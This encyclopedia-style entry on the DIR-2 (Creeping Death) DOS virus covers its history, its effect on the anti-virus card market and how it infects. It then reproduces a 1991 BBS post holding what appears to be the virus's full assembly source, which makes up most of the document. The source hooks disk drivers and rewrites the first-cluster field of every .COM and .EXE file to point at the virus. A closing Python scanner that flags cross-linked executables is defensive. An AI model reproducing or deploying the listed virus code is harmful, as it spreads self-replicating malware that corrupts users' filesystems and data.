Entry: DIR2 virus
Definition

A virus that rivals CIH. It has none of the obvious characteristics by which people had previously identified viruses; it modifies the DOS system to keep itself from being discovered, yet it is unmistakably a virus.

Background

Around 1994, Rising (瑞星) launched an anti-virus card. Whether an anti-virus card or anti-virus software was the better choice was one of the hot debates of the day. The card plugged into the computer and, because it could not be rewritten, was itself in no danger of infection; whether it could stop unknown viruses, however, was never settled. The card manufacturers argued that if one could identify the most basic characteristics of a virus, all known and unknown viruses could be blocked. The appearance of DIR2 completely broke through the anti-virus card makers' line of defense: it had none of the obvious characteristics previously used to identify a virus, and it modified the DOS system to hide itself, yet it was unmistakably a virus. As a result, anti-virus cards collapsed, while Wang Jiangmin's KV300 series stood out and, thanks to its openness and rapid updates, became the leader of the anti-virus market.

Principle

In its mode of infection and in its own structure this virus differs greatly from earlier boot-sector and file-parasitic viruses. On floppy and hard disks it occupies the last cluster of a disk smaller than 33 MB. On the large-capacity hard disks that were then rapidly appearing, however, the virus miscalculates that position, infects haphazardly, and becomes very hard to remove. The virus is actually 1024 or 2048 bytes long. Whenever DIR or any other command reads or writes the disk, the virus changes the first-cluster field in the directory entry of every .COM and .EXE file on the current disk to what it believes is the disk's last cluster number; the location that cluster number points to is where the virus hides on the disk.

Source code

===========================================================================
 BBS: The Programmer's Inn
Date: 11-24-91 (19:52)             Number: 3544
From: AHMED DOGAN                  Refer#: NONE
  To: ALL                           Recvd: NO
Subj: DIR-2                          Conf: (16) VIRUS
---------------------------------------------------------------------------

```asm
; Creeping Death V 1.0
;
; (C) Copyright 1991 by VirusSoft Corp.

i13org = 5f8h
i21org = 5fch

org 100h

mov sp,600h
inc counter
xor cx,cx
mov ds,cx
lds ax,[0c1h]
add ax,21h
push ds
push ax
mov ah,30h
call jump
cmp al,4
sbb si,si
mov drive+2,byte ptr -1
mov bx,60h
mov ah,4ah
call jump
mov ah,52h
call jump
push es:[bx-2]
lds bx,es:[bx]
search:
mov ax,[bx+si+15h]
cmp ax,70h
jne next
xchg ax,cx
mov [bx+si+18h],byte ptr -1
mov di,[bx+si+13h]
mov [bx+si+13h],offset header
mov [bx+si+15h],cs
next:
lds bx,[bx+si+19h]
cmp bx,-1
jne search
jcxz install
pop ds
mov ax,ds
add ax,[3]
inc ax
mov dx,cs
dec dx
cmp ax,dx
jne no_boot
add [3],61h
no_boot:
mov ds,dx
mov [1],8
mov ds,cx
les ax,[di+6]
mov cs:str_block,ax
mov cs:int_block,es
cld
mov si,1
scan:
dec si
lodsw
cmp ax,1effh
jne scan
mov ax,2cah
cmp [si+4],ax
je right
cmp [si+5],ax
jne scan
right:
lodsw
push cs
pop es
mov di,offset modify+1
stosw
xchg ax,si
mov di,offset i13org
cli
movsw
movsw
mov dx,0c000h
fdsk1:
mov ds,dx
xor si,si
lodsw
cmp ax,0aa55h
jne fdsk4
cbw
lodsb
mov cl,9
sal ax,cl
fdsk2:
cmp [si],6c7h
jne fdsk3
cmp [si+2],4ch
jne fdsk3
push dx
push [si+4]
jmp short death
install:
int 20h
file : db "c:",255,0
fdsk3:
inc si
cmp si,ax
jb fdsk2
fdsk4:
inc dx
cmp dh,0f0h
jb fdsk1
sub sp,4
death:
push cs
pop ds
mov bx,[2ch]
mov es,bx
mov ah,49h
call jump
xor ax,ax
test bx,bx
jz boot
mov di,1
seek:
dec di
scasw
jne seek
lea si,[di+2]
jmp short exec
boot:
mov es,[16h]
mov bx,es:[16h]
dec bx
xor si,si
exec:
push bx
mov bx,offset param
mov [bx+4],cs
mov [bx+8],cs
mov [bx+12],cs
pop ds
push cs
pop es
mov di,offset f_name
push di
mov cx,40
rep movsw
push cs
pop ds
mov ah,3dh
mov dx,offset file
call jump
pop dx
mov ax,4b00h
call jump
mov ah,4dh
call jump
mov ah,4ch
jump:
pushf
call dword ptr cs:[i21org]
ret

;--------Installation complete

i13pr:
mov ah,3
jmp dword ptr cs:[i13org]

main:
push ax ; driver
push cx ; strategy block
push dx
push ds
push si
push di
push es
pop ds
mov al,[bx+2]
cmp al,4 ; Input
je input
cmp al,8
je output
cmp al,9
je output
call in
cmp al,2 ; Build BPB
jne ppp ;
lds si,[bx+12h]
mov di,offset bpb_buf
mov es:[bx+12h],di
mov es:[bx+14h],cs
push es
push cs
pop es
mov cx,16
rep movsw
pop es
push cs
pop ds
mov al,[di+2-32]
cmp al,2
adc al,0
cbw
cmp [di+8-32],0
je m32
sub [di+8-32],ax
jmp short ppp
m32:
sub [di+15h-32],ax
sbb [di+17h-32],0
ppp:
pop di
pop si
pop ds
pop dx
pop cx
pop ax
rts:
retf
output:
mov cx,0ff09h
call check
jz inf_sec
call in
jmp short inf_dsk
inf_sec:
jmp _inf_sec
read:
jmp _read
read_:
add sp,16
jmp short ppp
input:
call check
jz read
inf_dsk:
mov byte ptr [bx+2],4
cld
lea si,[bx+0eh]
mov cx,8
save:
lodsw
push ax
loop save
mov [bx+14h],1
call driver
jnz read_
mov byte ptr [bx+2],2
call in
lds si,[bx+12h]
mov ax,[si+6]
add ax,15
mov cl,4
shr ax,cl
mov di,[si+0bh]
add di,di
stc
adc di,ax
push di
cwd
mov ax,[si+8]
test ax,ax
jnz more
mov ax,[si+15h]
mov dx,[si+17h]
more:
xor cx,cx
sub ax,di
sbb dx,cx
mov cl,[si+2]
div cx
cmp cl,2
sbb ax,-1
push ax
call convert
mov byte ptr es:[bx+2],4
mov es:[bx+14h],ax
call driver
again:
lds si,es:[bx+0eh]
add si,dx
sub dh,cl
adc dx,ax
mov cs:gad+1,dx
cmp cl,1
je small
mov ax,[si]
and ax,di
cmp ax,0fff7h
je bad
cmp ax,0ff7h
je bad
cmp ax,0ff70h
jne ok
bad:
pop ax
dec ax
push ax
call convert
jmp short again
small:
not di
and [si],di
pop ax
push ax
inc ax
push ax
mov dx,0fh
test di,dx
jz here
inc dx
mul dx
here:
or [si],ax
pop ax
call convert
mov si,es:[bx+0eh]
add si,dx
mov ax,[si]
and ax,di
ok:
mov dx,di
dec dx
and dx,di
not di
and [si],di
or [si],dx
cmp ax,dx
pop ax
pop di
mov cs:pointer+1,ax
je _read_
mov dx,[si]
push ds
push si
call write
pop si
pop ds
jnz _read_
call driver
cmp [si],dx
jne _read_
dec ax
dec ax
mul cx
add ax,di
adc dx,0
push es
pop ds
mov [bx+12h],2
mov [bx+14h],ax
test dx,dx
jz less
mov [bx+14h],-1
mov [bx+1ah],ax
mov [bx+1ch],dx
less:
mov [bx+10h],cs
mov [bx+0eh],100h
call write
_read_:
std
lea di,[bx+1ch]
mov cx,8
load:
pop ax
stosw
loop load
_read:
call in
mov cx,9
_inf_sec:
mov di,es:[bx+12h]
lds si,es:[bx+0eh]
sal di,cl
xor cl,cl
add di,si
xor dl,dl
push ds
push si
call find
jcxz no_inf
call write
and es:[bx+4],byte ptr 07fh
no_inf:
pop si
pop ds
inc dx
call find
jmp ppp

;--------Subroutines

find:
mov ax,[si+8]
cmp ax,"XE"
jne com
cmp [si+10],al
je found
com:
cmp ax,"OC"
jne go_on
cmp byte ptr [si+10],"M"
jne go_on
found:
test [si+1eh],0ffc0h ; >4MB
jnz go_on
test [si+1dh],03ff8h ; <2048B
jz go_on
test [si+0bh],byte ptr 1ch
jnz go_on
test dl,dl
jnz rest
pointer:
mov ax,1234h
cmp ax,[si+1ah]
je go_on
xchg ax,[si+1ah]
gad:
xor ax,1234h
mov [si+14h],ax
loop go_on
rest:
xor ax,ax
xchg ax,[si+14h]
xor ax,cs:gad+1
mov [si+1ah],ax
go_on:
;rol cs:gad+1,1
db 2eh,0d1h,6
dw offset gad+1
add si,32
cmp di,si
jne find
ret
check:
mov ah,[bx+1]
drive:
cmp ah,-1
mov cs:[drive+2],ah
jne changed
push [bx+0eh]
mov byte ptr [bx+2],1
call in
cmp byte ptr [bx+0eh],1
pop [bx+0eh]
mov [bx+2],al
changed:
ret
write:
cmp byte ptr es:[bx+2],8
jae in
mov byte ptr es:[bx+2],4
mov si,70h
mov ds,si
modify:
mov si,1234h
push [si]
push [si+2]
mov [si],offset i13pr
mov [si+2],cs
call in
pop [si+2]
pop [si]
ret
driver:
mov es:[bx+12h],1
in:
db 09ah
str_block: dw ?,70h
db 09ah
int_block: dw ?,70h
test es:[bx+4],byte ptr 80h
ret
convert:
cmp ax,0ff0h
jae fat_16
mov si,3
xor cs:[si+gad-1],si
mul si
shr ax,1
mov di,0fffh
jnc cont
mov di,0fff0h
jmp short cont
fat_16:
mov si,2
mul si
mov di,0ffffh
cont:
mov si,512
div si
header:
inc ax
ret
counter: dw 0
dw 842h
dw offset main
dw offset rts
db 7fh
param: dw 0,80h,?,5ch,?,6ch,?
bpb_buf: db 32 dup(?)
f_name: db 80 dup(?)

;--------The End.
```
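The Principle section above gives the defender a concrete, checkable symptom: DIR2 rewrites the first-cluster field (offset 0x1A of the 32-byte FAT directory entry) of every .COM and .EXE entry so that all of them point at the single cluster where the virus body sits. A clean FAT filesystem never has two files beginning in the same cluster, so executables that share a start cluster are cross-linked and a strong indicator of this infection. The following scanner is an added example written for this entry, not code from the encyclopedia page or from the virus listing: it parses raw directory entries, skips entries with attributes 0x1C (system, volume label, directory, the same mask the listing's `find` routine excludes), and reports executables whose start cluster is shared. The sample directory it scans is constructed inline; names, sizes and cluster numbers are made up for the demonstration.

```python
"""Detect DIR2-style cross-linked executables in a FAT12/16 directory.

Added example for this encyclopedia entry; not part of the original page.
"""
import struct
from collections import defaultdict

ENTRY_SIZE = 32
ATTR_SKIP = 0x1C            # system | volume label | directory
EXECUTABLE_EXTS = ("COM", "EXE")


def parse_entries(raw):
    """Parse raw 8.3 directory entries; stop at the first empty entry."""
    entries = []
    for off in range(0, len(raw) - ENTRY_SIZE + 1, ENTRY_SIZE):
        e = raw[off:off + ENTRY_SIZE]
        if e[0] == 0x00:            # 0x00 marks end of directory
            break
        if e[0] == 0xE5:            # 0xE5 marks a deleted entry
            continue
        entries.append({
            "name": e[0:8].decode("ascii", "replace").rstrip(),
            "ext": e[8:11].decode("ascii", "replace").rstrip(),
            "attr": e[11],
            # offset 0x1A: first cluster (low word); DIR2 rewrites this field
            "first_cluster": struct.unpack_from("<H", e, 0x1A)[0],
            # offset 0x1C: file size in bytes
            "size": struct.unpack_from("<I", e, 0x1C)[0],
        })
    return entries


def find_crosslinked_executables(raw):
    """Return {cluster: [file names]} for clusters shared by 2+ executables.

    Two files starting in the same cluster is impossible on a clean FAT
    volume, so any hit here is cross-linking of the kind DIR2 produces.
    """
    by_cluster = defaultdict(list)
    for ent in parse_entries(raw):
        if ent["attr"] & ATTR_SKIP:
            continue
        if ent["ext"] not in EXECUTABLE_EXTS or ent["first_cluster"] == 0:
            continue
        by_cluster[ent["first_cluster"]].append(ent["name"] + "." + ent["ext"])
    return {c: names for c, names in by_cluster.items() if len(names) > 1}


def make_entry(name, ext, attr, first_cluster, size):
    """Build one 32-byte FAT directory entry (timestamps left zero)."""
    return (name.ljust(8).encode("ascii") + ext.ljust(3).encode("ascii")
            + bytes([attr]) + bytes(14)
            + struct.pack("<H", first_cluster) + struct.pack("<I", size))


def sample_directory(infected=True):
    """Constructed sample directory (hypothetical files and clusters).

    In the infected variant the three larger executables all start in
    cluster 5, mimicking DIR2's rewrite of the first-cluster field.
    """
    entries = [
        make_entry("COMMAND", "COM", 0x20, 5 if infected else 3, 47845),
        make_entry("EDIT", "EXE", 0x20, 5 if infected else 12, 69886),
        make_entry("README", "TXT", 0x20, 7, 1200),
        make_entry("GAME", "EXE", 0x20, 5 if infected else 20, 250000),
        make_entry("TOOL", "COM", 0x20, 9, 900),   # small file, left alone
        make_entry("DOS", "", 0x10, 2, 0),          # subdirectory, skipped
    ]
    return b"".join(entries) + bytes(ENTRY_SIZE)   # terminating empty entry


if __name__ == "__main__":
    for label, raw in (("infected", sample_directory(True)),
                       ("clean", sample_directory(False))):
        hits = find_crosslinked_executables(raw)
        print(label, "->", hits if hits else "no cross-linked executables")
```

Run against an image of a real FAT12/16 root directory (for example the bytes read from the root-directory region of a disk image), the same function flags any executables sharing a start cluster; a non-empty result is the cue to compare the FAT chain of that cluster against the files' recorded sizes before trusting anything on the volume.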